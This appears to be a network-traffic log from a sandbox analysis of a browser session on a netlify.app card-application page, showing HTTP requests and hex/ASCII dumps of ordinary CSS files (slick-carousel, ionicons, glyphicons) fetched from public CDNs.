      2024-09-27 02:26:39 UTC1369INData Raw: 6e 74 65 6e 74 3a 22 5c 65 31 37 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 6c 6f 70 70 79 2d 73 61 76 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 6c 6f 70 70 79 2d 6f 70 65 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 36 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 72 65 64 69 74 2d 63 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 37 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 74 72 61 6e 73 66 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 38 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 75 74 6c 65 72 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 37 39 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 68 65 61 64 65 72 3a
      Data Ascii: ntent:"\e174"}.glyphicon-floppy-save:before{content:"\e175"}.glyphicon-floppy-open:before{content:"\e176"}.glyphicon-credit-card:before{content:"\e177"}.glyphicon-transfer:before{content:"\e178"}.glyphicon-cutlery:before{content:"\e179"}.glyphicon-header:


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      2192.168.2.649719151.101.129.2294431672C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      2024-09-27 02:26:39 UTC586OUTGET /npm/slick-carousel@1.8.1/slick/slick.css HTTP/1.1
      Host: cdn.jsdelivr.net
      Connection: keep-alive
      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
      sec-ch-ua-mobile: ?0
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      sec-ch-ua-platform: "Windows"
      Accept: text/css,*/*;q=0.1
      Sec-Fetch-Site: cross-site
      Sec-Fetch-Mode: no-cors
      Sec-Fetch-Dest: style
      Referer: https://pengajuan-kartufisik.netlify.app/
      Accept-Encoding: gzip, deflate, br
      Accept-Language: en-US,en;q=0.9
      2024-09-27 02:26:39 UTC759INHTTP/1.1 200 OK
      Connection: close
      Content-Length: 1776
      Access-Control-Allow-Origin: *
      Access-Control-Expose-Headers: *
      Timing-Allow-Origin: *
      Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
      Cross-Origin-Resource-Policy: cross-origin
      X-Content-Type-Options: nosniff
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Content-Type: text/css; charset=utf-8
      X-JSD-Version: 1.8.1
      X-JSD-Version-Type: version
      ETag: W/"6f0-qUoFmzF4tK3sCeMoGs4oGaMAlaQ"
      Accept-Ranges: bytes
      Age: 1826655
      Date: Fri, 27 Sep 2024 02:26:39 GMT
      X-Served-By: cache-fra-etou8220022-FRA, cache-ewr-kewr1740040-EWR
      X-Cache: HIT, HIT
      Vary: Accept-Encoding
      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
      2024-09-27 02:26:39 UTC1378INData Raw: 2f 2a 20 53 6c 69 64 65 72 20 2a 2f 0a 2e 73 6c 69 63 6b 2d 73 6c 69 64 65 72 0a 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 75 73 65 72 2d 73 65 6c 65 63 74 3a 20 6e 6f 6e 65 3b 0a 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 6f 75 63 68 2d 63 61 6c 6c 6f 75 74 3a 20
      Data Ascii: /* Slider */.slick-slider{ position: relative; display: block; box-sizing: border-box; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; -webkit-touch-callout:
      2024-09-27 02:26:39 UTC398INData Raw: 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 7d 0a 2e 73 6c 69 63 6b 2d 73 6c 69 64 65 2e 73 6c 69 63 6b 2d 6c 6f 61 64 69 6e 67 20 69 6d 67 0a 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 7d 0a 2e 73 6c 69 63 6b 2d 73 6c 69 64 65 2e 64 72 61 67 67 69 6e 67 20 69 6d 67 0a 7b 0a 20 20 20 20 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 20 6e 6f 6e 65 3b 0a 7d 0a 2e 73 6c 69 63 6b 2d 69 6e 69 74 69 61 6c 69 7a 65 64 20 2e 73 6c 69 63 6b 2d 73 6c 69 64 65 0a 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 7d 0a 2e 73 6c 69 63 6b 2d 6c 6f 61 64 69 6e 67 20 2e 73 6c 69 63 6b 2d 73 6c 69 64 65 0a 7b 0a 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 7d 0a 2e 73 6c 69 63 6b 2d 76 65 72 74 69 63 61
      Data Ascii: display: block;}.slick-slide.slick-loading img{ display: none;}.slick-slide.dragging img{ pointer-events: none;}.slick-initialized .slick-slide{ display: block;}.slick-loading .slick-slide{ visibility: hidden;}.slick-vertica


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      3192.168.2.649711151.101.129.2294431672C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      2024-09-27 02:26:39 UTC592OUTGET /npm/slick-carousel@1.8.1/slick/slick-theme.css HTTP/1.1
      Host: cdn.jsdelivr.net
      Connection: keep-alive
      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
      sec-ch-ua-mobile: ?0
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      sec-ch-ua-platform: "Windows"
      Accept: text/css,*/*;q=0.1
      Sec-Fetch-Site: cross-site
      Sec-Fetch-Mode: no-cors
      Sec-Fetch-Dest: style
      Referer: https://pengajuan-kartufisik.netlify.app/
      Accept-Encoding: gzip, deflate, br
      Accept-Language: en-US,en;q=0.9
      2024-09-27 02:26:39 UTC758INHTTP/1.1 200 OK
      Connection: close
      Content-Length: 3145
      Access-Control-Allow-Origin: *
      Access-Control-Expose-Headers: *
      Timing-Allow-Origin: *
      Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
      Cross-Origin-Resource-Policy: cross-origin
      X-Content-Type-Options: nosniff
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Content-Type: text/css; charset=utf-8
      X-JSD-Version: 1.8.1
      X-JSD-Version-Type: version
      ETag: W/"c49-gaQ0+U8rESTzIyu4bylE+C+yOsA"
      Accept-Ranges: bytes
      Age: 780212
      Date: Fri, 27 Sep 2024 02:26:39 GMT
      X-Served-By: cache-fra-eddf8230023-FRA, cache-ewr-kewr1740034-EWR
      X-Cache: HIT, HIT
      Vary: Accept-Encoding
      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
      2024-09-27 02:26:39 UTC1378INData Raw: 40 63 68 61 72 73 65 74 20 27 55 54 46 2d 38 27 3b 0a 2f 2a 20 53 6c 69 64 65 72 20 2a 2f 0a 2e 73 6c 69 63 6b 2d 6c 6f 61 64 69 6e 67 20 2e 73 6c 69 63 6b 2d 6c 69 73 74 0a 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 20 75 72 6c 28 27 2e 2f 61 6a 61 78 2d 6c 6f 61 64 65 72 2e 67 69 66 27 29 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 7d 0a 0a 2f 2a 20 49 63 6f 6e 73 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 0a 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 73 6c 69 63 6b 27 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 0a 20 20 20 20 73 72 63 3a 20 75 72 6c 28 27 2e 2f 66 6f 6e 74
      Data Ascii: @charset 'UTF-8';/* Slider */.slick-loading .slick-list{ background: #fff url('./ajax-loader.gif') center center no-repeat;}/* Icons */@font-face{ font-family: 'slick'; font-weight: normal; font-style: normal; src: url('./font
      2024-09-27 02:26:39 UTC1378INData Raw: 61 63 69 74 79 3a 20 2e 37 35 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0a 20 20 20 20 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 67 72 61 79 73 63 61 6c 65 3b 0a 7d 0a 0a 2e 73 6c 69 63 6b 2d 70 72 65 76 0a 7b 0a 20 20 20 20 6c 65 66 74 3a 20 2d 32 35 70 78 3b 0a 7d 0a 5b 64 69 72 3d 27 72 74 6c 27 5d 20 2e 73 6c 69 63 6b 2d 70 72 65 76 0a 7b 0a 20 20 20 20 72 69 67 68 74 3a 20 2d 32 35 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 7d 0a 2e 73 6c 69 63 6b 2d 70 72 65 76 3a 62 65 66 6f 72 65 0a 7b 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 27 e2 86 90 27 3b 0a 7d 0a 5b 64
      Data Ascii: acity: .75; color: white; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;}.slick-prev{ left: -25px;}[dir='rtl'] .slick-prev{ right: -25px; left: auto;}.slick-prev:before{ content: '';}[d
      2024-09-27 02:26:39 UTC389INData Raw: 79 3a 20 27 73 6c 69 63 6b 27 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 70 78 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 30 70 78 3b 0a 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 30 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 0a 20 20 20 20 77 69 64 74 68 3a 20 32 30 70 78 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 32 30 70 78 3b 0a 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 27 e2 80 a2 27 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 2e 32 35 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 0a 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74
      Data Ascii: y: 'slick'; font-size: 6px; line-height: 20px; position: absolute; top: 0; left: 0; width: 20px; height: 20px; content: ''; text-align: center; opacity: .25; color: black; -webkit-font-smoothing: ant


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      4192.168.2.649712172.67.69.294431672C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      2024-09-27 02:26:39 UTC588OUTGET /ionicons/2.0.1/css/ionicons.min.css HTTP/1.1
      Host: code.ionicframework.com
      Connection: keep-alive
      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
      sec-ch-ua-mobile: ?0
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      sec-ch-ua-platform: "Windows"
      Accept: text/css,*/*;q=0.1
      Sec-Fetch-Site: cross-site
      Sec-Fetch-Mode: no-cors
      Sec-Fetch-Dest: style
      Referer: https://pengajuan-kartufisik.netlify.app/
      Accept-Encoding: gzip, deflate, br
      Accept-Language: en-US,en;q=0.9
      2024-09-27 02:26:39 UTC1020INHTTP/1.1 200 OK
      Date: Fri, 27 Sep 2024 02:26:39 GMT
      Content-Type: text/css; charset=utf-8
      Transfer-Encoding: chunked
      Connection: close
      Last-Modified: Thu, 13 Apr 2023 16:20:19 GMT
      Access-Control-Allow-Origin: *
      ETag: W/"64382bc3-c854"
      expires: Tue, 10 Sep 2024 08:56:28 GMT
      Cache-Control: max-age=31536000
      x-proxy-cache: MISS
      X-GitHub-Request-Id: F402:112681:58DFD12:61D9659:66E00763
      Via: 1.1 varnish
      Age: 44501
      X-Served-By: cache-lga21982-LGA
      X-Cache: HIT
      X-Cache-Hits: 4
      X-Timer: S1727359499.679757,VS0,VE0
      Vary: Accept-Encoding
      X-Fastly-Request-ID: 7f6f6edaf725b6266eef86fa211cf8854188725b
      CF-Cache-Status: HIT
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CBnkRboNlg%2BcfZyfdjDmNiui3AzjnrmSEmXRTeuj97VZ%2BCDl43Ig245ZfUzmc3r4B5h3i%2Be6476trx2ggnDDcvYtag028kpUNqdnOY845SGTYjGJge64TlCfcjObIZWnx0%2FbjuVNvVSn"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8c980cd4098d1770-EWR
      2024-09-27 02:26:39 UTC349INData Raw: 37 62 61 36 0d 0a 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2f 2a 21 0a 20 20 49 6f 6e 69 63 6f 6e 73 2c 20 76 32 2e 30 2e 31 0a 20 20 43 72 65 61 74 65 64 20 62 79 20 42 65 6e 20 53 70 65 72 72 79 20 66 6f 72 20 74 68 65 20 49 6f 6e 69 63 20 46 72 61 6d 65 77 6f 72 6b 2c 20 68 74 74 70 3a 2f 2f 69 6f 6e 69 63 6f 6e 73 2e 63 6f 6d 2f 0a 20 20 68 74 74 70 73 3a 2f 2f 74 77 69 74 74 65 72 2e 63 6f 6d 2f 62 65 6e 6a 73 70 65 72 72 79 20 20 68 74 74 70 73 3a 2f 2f 74 77 69 74 74 65 72 2e 63 6f 6d 2f 69 6f 6e 69 63 66 72 61 6d 65 77 6f 72 6b 0a 20 20 4d 49 54 20 4c 69 63 65 6e 73 65 3a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 64 72 69 66 74 79 63 6f 2f 69 6f 6e 69 63 6f 6e 73 0a 0a 20 20 41 6e 64 72 6f 69 64 2d 73 74 79 6c 65 20 69
      Data Ascii: 7ba6@charset "UTF-8";/*! Ionicons, v2.0.1 Created by Ben Sperry for the Ionic Framework, http://ionicons.com/ https://twitter.com/benjsperry https://twitter.com/ionicframework MIT License: https://github.com/driftyco/ionicons Android-style i
      2024-09-27 02:26:39 UTC1369INData Raw: 6c 2d 64 65 73 69 67 6e 2d 69 63 6f 6e 73 0a 20 20 75 73 65 64 20 75 6e 64 65 72 20 43 43 20 42 59 20 68 74 74 70 3a 2f 2f 63 72 65 61 74 69 76 65 63 6f 6d 6d 6f 6e 73 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 62 79 2f 34 2e 30 2f 0a 20 20 4d 6f 64 69 66 69 65 64 20 69 63 6f 6e 73 20 74 6f 20 66 69 74 20 69 6f 6e 69 63 6f 6e e2 80 99 73 20 67 72 69 64 20 66 72 6f 6d 20 6f 72 69 67 69 6e 61 6c 2e 0a 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 49 6f 6e 69 63 6f 6e 73 22 3b 73 72 63 3a 75 72 6c 28 22 2e 2e 2f 66 6f 6e 74 73 2f 69 6f 6e 69 63 6f 6e 73 2e 65 6f 74 3f 76 3d 32 2e 30 2e 31 22 29 3b 73 72 63 3a 75 72 6c 28 22 2e 2e 2f 66 6f 6e 74 73 2f 69 6f 6e 69 63 6f 6e 73 2e 65 6f 74 3f 76 3d 32 2e 30 2e 31 23 69 65 66 69 78
      Data Ascii: l-design-icons used under CC BY http://creativecommons.org/licenses/by/4.0/ Modified icons to fit ionicons grid from original.*/@font-face{font-family:"Ionicons";src:url("../fonts/ionicons.eot?v=2.0.1");src:url("../fonts/ionicons.eot?v=2.0.1#iefix
      2024-09-27 02:26:39 UTC1369INData Raw: 69 64 2d 63 61 6c 6c 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 61 6e 64 72 6f 69 64 2d 63 61 6d 65 72 61 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 61 6e 64 72 6f 69 64 2d 63 61 6e 63 65 6c 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 61 6e 64 72 6f 69 64 2d 63 61 72 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 61 6e 64 72 6f 69 64 2d 63 61 72 74 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 61 6e 64 72 6f 69 64 2d 63 68 61 74 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 61 6e 64 72 6f 69 64 2d 63 68 65 63 6b 62 6f 78 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 61 6e 64 72 6f 69 64 2d 63 68 65 63 6b 62 6f 78 2d 62 6c 61 6e 6b 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 61 6e 64 72 6f 69 64 2d 63 68 65 63 6b 62 6f 78 2d 6f 75 74 6c 69 6e 65 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 61 6e 64 72 6f 69
      Data Ascii: id-call:before,.ion-android-camera:before,.ion-android-cancel:before,.ion-android-car:before,.ion-android-cart:before,.ion-android-chat:before,.ion-android-checkbox:before,.ion-android-checkbox-blank:before,.ion-android-checkbox-outline:before,.ion-androi
      2024-09-27 02:26:39 UTC1369INData Raw: 64 72 6f 69 64 2d 6d 61 69 6c 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 61 6e 64 72 6f 69 64 2d 6d 61 70 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 61 6e 64 72 6f 69 64 2d 6d 65 6e 75 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 61 6e 64 72 6f 69 64 2d 6d 69 63 72 6f 70 68 6f 6e 65 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 61 6e 64 72 6f 69 64 2d 6d 69 63 72 6f 70 68 6f 6e 65 2d 6f 66 66 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 61 6e 64 72 6f 69 64 2d 6d 6f 72 65 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 61 6e 64 72 6f 69 64 2d 6d 6f 72 65 2d 76 65 72 74 69 63 61 6c 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 61 6e 64 72 6f 69 64 2d 6e 61 76 69 67 61 74 65 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 61 6e 64 72 6f 69 64 2d 6e 6f 74 69 66 69 63 61 74 69
      Data Ascii: droid-mail:before,.ion-android-map:before,.ion-android-menu:before,.ion-android-microphone:before,.ion-android-microphone-off:before,.ion-android-more-horizontal:before,.ion-android-more-vertical:before,.ion-android-navigate:before,.ion-android-notificati
      2024-09-27 02:26:39 UTC1369INData Raw: 6f 72 65 2c 2e 69 6f 6e 2d 61 6e 64 72 6f 69 64 2d 76 6f 6c 75 6d 65 2d 6d 75 74 65 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 61 6e 64 72 6f 69 64 2d 76 6f 6c 75 6d 65 2d 6f 66 66 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 61 6e 64 72 6f 69 64 2d 76 6f 6c 75 6d 65 2d 75 70 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 61 6e 64 72 6f 69 64 2d 77 61 6c 6b 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 61 6e 64 72 6f 69 64 2d 77 61 72 6e 69 6e 67 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 61 6e 64 72 6f 69 64 2d 77 61 74 63 68 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 61 6e 64 72 6f 69 64 2d 77 69 66 69 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 61 70 65 72 74 75 72 65 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 61 72 63 68 69 76 65 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 61 72 72 6f 77 2d 64 6f
      Data Ascii: ore,.ion-android-volume-mute:before,.ion-android-volume-off:before,.ion-android-volume-up:before,.ion-android-walk:before,.ion-android-warning:before,.ion-android-watch:before,.ion-android-wifi:before,.ion-aperture:before,.ion-archive:before,.ion-arrow-do
      2024-09-27 02:26:39 UTC1369INData Raw: 74 62 6f 78 2d 77 6f 72 6b 69 6e 67 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 63 68 61 74 62 6f 78 65 73 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 63 68 61 74 62 75 62 62 6c 65 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 63 68 61 74 62 75 62 62 6c 65 2d 77 6f 72 6b 69 6e 67 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 63 68 61 74 62 75 62 62 6c 65 73 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 63 68 65 63 6b 6d 61 72 6b 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 63 68 65 63 6b 6d 61 72 6b 2d 63 69 72 63 6c 65 64 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 63 68 65 63 6b 6d 61 72 6b 2d 72 6f 75 6e 64 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 63 68 65 76 72 6f 6e 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 63 68 65 76 72 6f 6e 2d 6c 65 66 74 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d
      Data Ascii: tbox-working:before,.ion-chatboxes:before,.ion-chatbubble:before,.ion-chatbubble-working:before,.ion-chatbubbles:before,.ion-checkmark:before,.ion-checkmark-circled:before,.ion-checkmark-round:before,.ion-chevron-down:before,.ion-chevron-left:before,.ion-
      2024-09-27 02:26:39 UTC1369INData Raw: 65 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 68 65 61 72 74 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 68 65 61 72 74 2d 62 72 6f 6b 65 6e 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 68 65 6c 70 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 68 65 6c 70 2d 62 75 6f 79 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 68 65 6c 70 2d 63 69 72 63 6c 65 64 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 68 6f 6d 65 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 63 65 63 72 65 61 6d 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6d 61 67 65 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6d 61 67 65 73 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6e 66 6f 72 6d 61 74 69 6f 6e 2d 63 69 72 63 6c 65 64 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 6e
      Data Ascii: e:before,.ion-heart:before,.ion-heart-broken:before,.ion-help:before,.ion-help-buoy:before,.ion-help-circled:before,.ion-home:before,.ion-icecream:before,.ion-image:before,.ion-images:before,.ion-information:before,.ion-information-circled:before,.ion-ion
      2024-09-27 02:26:39 UTC1369INData Raw: 65 2d 6f 75 74 6c 69 6e 65 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 73 2d 62 72 6f 77 73 65 72 73 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 73 2d 62 72 6f 77 73 65 72 73 2d 6f 75 74 6c 69 6e 65 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 73 2d 63 61 6c 63 75 6c 61 74 6f 72 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 73 2d 63 61 6c 63 75 6c 61 74 6f 72 2d 6f 75 74 6c 69 6e 65 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 73 2d 63 61 6c 65 6e 64 61 72 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 73 2d 63 61 6c 65 6e 64 61 72 2d 6f 75 74 6c 69 6e 65 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 73 2d 63 61 6d 65 72 61 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 73 2d 63 61 6d 65 72 61 2d 6f 75 74 6c 69 6e 65 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69
      Data Ascii: e-outline:before,.ion-ios-browsers:before,.ion-ios-browsers-outline:before,.ion-ios-calculator:before,.ion-ios-calculator-outline:before,.ion-ios-calendar:before,.ion-ios-calendar-outline:before,.ion-ios-camera:before,.ion-ios-camera-outline:before,.ion-i
      2024-09-27 02:26:39 UTC1369INData Raw: 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 73 2d 63 72 6f 70 2d 73 74 72 6f 6e 67 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 73 2d 64 6f 77 6e 6c 6f 61 64 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 73 2d 64 6f 77 6e 6c 6f 61 64 2d 6f 75 74 6c 69 6e 65 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 73 2d 64 72 61 67 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 73 2d 65 6d 61 69 6c 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 73 2d 65 6d 61 69 6c 2d 6f 75 74 6c 69 6e 65 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 73 2d 65 79 65 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 73 2d 65 79 65 2d 6f 75 74 6c 69 6e 65 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 73 2d 66 61 73 74 66 6f 72 77 61 72 64 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 73 2d 66 61 73 74 66 6f 72
      Data Ascii: ore,.ion-ios-crop-strong:before,.ion-ios-download:before,.ion-ios-download-outline:before,.ion-ios-drag:before,.ion-ios-email:before,.ion-ios-email-outline:before,.ion-ios-eye:before,.ion-ios-eye-outline:before,.ion-ios-fastforward:before,.ion-ios-fastfor
      2024-09-27 02:26:39 UTC1369INData Raw: 74 6c 69 6e 65 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 73 2d 6b 65 79 70 61 64 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 73 2d 6b 65 79 70 61 64 2d 6f 75 74 6c 69 6e 65 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 73 2d 6c 69 67 68 74 62 75 6c 62 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 73 2d 6c 69 67 68 74 62 75 6c 62 2d 6f 75 74 6c 69 6e 65 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 73 2d 6c 69 73 74 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 73 2d 6c 69 73 74 2d 6f 75 74 6c 69 6e 65 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 73 2d 6c 6f 63 61 74 69 6f 6e 3a 62 65 66 6f 72 65 2c 2e 69 6f 6e 2d 69 6f 73 2d 6c 6f 63 61 74 69 6f 6e 